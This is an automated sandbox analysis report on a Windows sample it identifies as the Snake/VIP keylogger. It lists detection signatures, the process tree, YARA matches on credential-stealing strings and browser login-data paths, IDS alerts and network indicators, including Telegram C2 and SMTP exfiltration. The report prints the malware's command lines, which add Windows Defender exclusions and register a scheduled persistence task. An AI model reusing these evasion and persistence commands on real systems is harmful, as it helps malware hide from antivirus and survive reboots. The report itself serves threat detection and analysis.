
Windows Analysis Report
SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe

Overview

General Information

Sample name: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe
Analysis ID: 1550765
MD5: 57fcb286b01acc3318e455c23d5f857f
SHA1: a01a9de8ed1dbd2dad4285748ed1eb2a4765f8d0
SHA256: 9e29fdeaf847390ef0ac52a24dca3803eb3b7527e3ecb8c2c18bc337c7425a5e
Tags: exe

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe (PID: 6992 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe" MD5: 57FCB286B01ACC3318E455C23D5F857F)
    • powershell.exe (PID: 4504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7380 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 5432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\zDAKFK.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5312 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe (PID: 7176 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe" MD5: 57FCB286B01ACC3318E455C23D5F857F)
      • WerFault.exe (PID: 7704 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7176 -s 1520 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • zDAKFK.exe (PID: 7248 cmdline: C:\Users\user\AppData\Roaming\zDAKFK.exe MD5: 57FCB286B01ACC3318E455C23D5F857F)
    • schtasks.exe (PID: 7504 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • zDAKFK.exe (PID: 7556 cmdline: "C:\Users\user\AppData\Roaming\zDAKFK.exe" MD5: 57FCB286B01ACC3318E455C23D5F857F)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
No configs have been found
Source: 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_SnakeKeylogger; Description: Yara detected Snake Keylogger; Author: Joe Security
Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp; Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown; Strings:
  • 0x2d5a6:$a1: get_encryptedPassword
  • 0x2d8c3:$a2: get_encryptedUsername
  • 0x2d3b6:$a3: get_timePasswordChanged
  • 0x2d4bf:$a4: get_passwordField
  • 0x2d5bc:$a5: set_encryptedPassword
  • 0x2ec16:$a7: get_logins
  • 0x2eb79:$a10: KeyLoggerEventArgs
  • 0x2e7de:$a11: KeyLoggerEventArgsEventHandler

Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack; Rule: JoeSecurity_VIPKeylogger; Description: Yara detected VIP Keylogger; Author: Joe Security
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack; Rule: JoeSecurity_TelegramRAT; Description: Yara detected Telegram RAT; Author: Joe Security
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack; Rule: Windows_Trojan_SnakeKeylogger_af3faa65; Description: unknown; Author: unknown; Strings:
  • 0x2b9a6:$a1: get_encryptedPassword
  • 0x2bcc3:$a2: get_encryptedUsername
  • 0x2b7b6:$a3: get_timePasswordChanged
  • 0x2b8bf:$a4: get_passwordField
  • 0x2b9bc:$a5: set_encryptedPassword
  • 0x2d016:$a7: get_logins
  • 0x2cf79:$a10: KeyLoggerEventArgs
  • 0x2cbde:$a11: KeyLoggerEventArgsEventHandler
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack; Rule: MAL_Envrial_Jan18_1; Description: Detects Encrial credential stealer malware; Author: Florian Roth; Strings:
  • 0x39714:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38db7:$a3: \Google\Chrome\User Data\Default\Login Data
  • 0x39014:$a4: \Orbitum\User Data\Default\Login Data
  • 0x399f3:$a5: \Kometa\User Data\Default\Login Data

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ProcessId: 4504, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ProcessId: 4504, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\zDAKFK.exe, ParentImage: C:\Users\user\AppData\Roaming\zDAKFK.exe, ParentProcessId: 7248, ParentProcessName: zDAKFK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpCFF6.tmp", ProcessId: 7504, ProcessName: schtasks.exe
Source: Network Connection; Author: frack113; Data: DestinationIp: 205.147.111.116, DestinationIsIpv6: false, DestinationPort: 2525, EventID: 3, Image: C:\Users\user\AppData\Roaming\zDAKFK.exe, Initiated: true, ProcessId: 7556, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49783
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", ProcessId: 5312, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ProcessId: 4504, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ParentProcessId: 6992, ParentProcessName: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zDAKFK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE43.tmp", ProcessId: 5312, ProcessName: schtasks.exe

Suricata IDS alerts

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-07T06:20:22.142526+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.4 | 49752 | TCP
2024-11-07T06:20:59.576883+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.4 | 49784 | TCP
2024-11-07T06:20:27.333981+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49764 | 188.114.97.3 | 443 | TCP
2024-11-07T06:20:30.034678+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49773 | 188.114.97.3 | 443 | TCP
2024-11-07T06:20:31.528000+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49778 | 188.114.97.3 | 443 | TCP
2024-11-07T06:20:06.716853+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49774 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:06.716853+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49765 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:06.716853+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49775 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:21.398753+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49736 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:23.206957+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49736 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:26.617516+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49736 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:29.305022+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49769 | 193.122.130.0 | 80 | TCP
2024-11-07T06:20:30.820638+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49776 | 193.122.130.0 | 80 | TCP


AV Detection

Source: C:\Users\user\AppData\Roaming\zDAKFK.exe; ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe; Virustotal: Detection: 22%
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe; ReversingLabs: Detection: 21%
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe; Virustotal: Detection: 22%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe; Joe Sandbox ML: detected
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe; Joe Sandbox ML: detected

Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49764 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49773 version: TLS 1.0
Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\mscorlib.pdb T source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.ni.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: System.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: n.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbXT source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\exe\PHCUmkeAjDPT.pdb#x source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdbd source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: \??\C:\Windows\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.PDB source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: PHCUmkeAjDPT.pdbeAjDPT.pdbpdbDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdbd source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: System.Configuration.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: \??\C:\Windows\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: System.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: System.Core.ni.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: System.Windows.Forms.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: n8C:\Windows\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, zDAKFK.exe.0.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: PHCUmkeAjDPT.pdbSHA256 source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, zDAKFK.exe.0.dr
Source: Binary string: System.pdbH source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: mscorlib.ni.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: symbols\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: C:\Windows\PHCUmkeAjDPT.pdbpdbDPT.pdb li source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: PHCUmkeAjDPT.pdb089 source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: System.ni.pdb source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: \??\C:\Windows\symbols\exe\PHCUmkeAjDPT.pdb source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: nC:\Users\user\Desktop\PHCUmkeAjDPT.pdbp source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988333052.0000000000B57000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Core.ni.pdbRSDS source: WER8E2A.tmp.dmp.19.dr
Source: Binary string: \??\C:\Windows\PHCUmkeAjDPT.pdb8B source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988462389.0000000000C46000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe; Code function: 4x nop then jmp 0F0314ACh (function 0_2_0F030E5F)
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe; Code function: 4x nop then jmp 00D9F2D5h (function 16_2_00D9F138)
Source: C:\Users\user\AppData\Roaming\zDAKFK.exe; Code function: 4x nop then jmp 00D9F2D5h (function 16_2_00D9F324)

Networking

Source: unknown; DNS query: name: api.telegram.org
Source: Yara match; File source: 12.2.zDAKFK.exe.40f44c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 12.2.zDAKFK.exe.40b12a8.0.raw.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.4:49783 -> 205.147.111.116:2525
Source: global traffic; HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1 | Host: reallyfreegeoip.org
Source: Joe Sandbox View; IP Address: 149.154.167.220
Source: Joe Sandbox View; IP Address: 188.114.97.3
Source: Joe Sandbox View; IP Address: 188.114.97.3
Source: Joe Sandbox View; IP Address: 193.122.130.0
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown; DNS query: name: checkip.dyndns.org
Source: unknown; DNS query: name: reallyfreegeoip.org
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49776 -> 193.122.130.0:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49769 -> 193.122.130.0:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 193.122.130.0:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49774 -> 193.122.130.0:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49765 -> 193.122.130.0:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49775 -> 193.122.130.0:80
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49773 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49764 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49778 -> 188.114.97.3:443
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49784
Source: Network traffic; Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49752
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
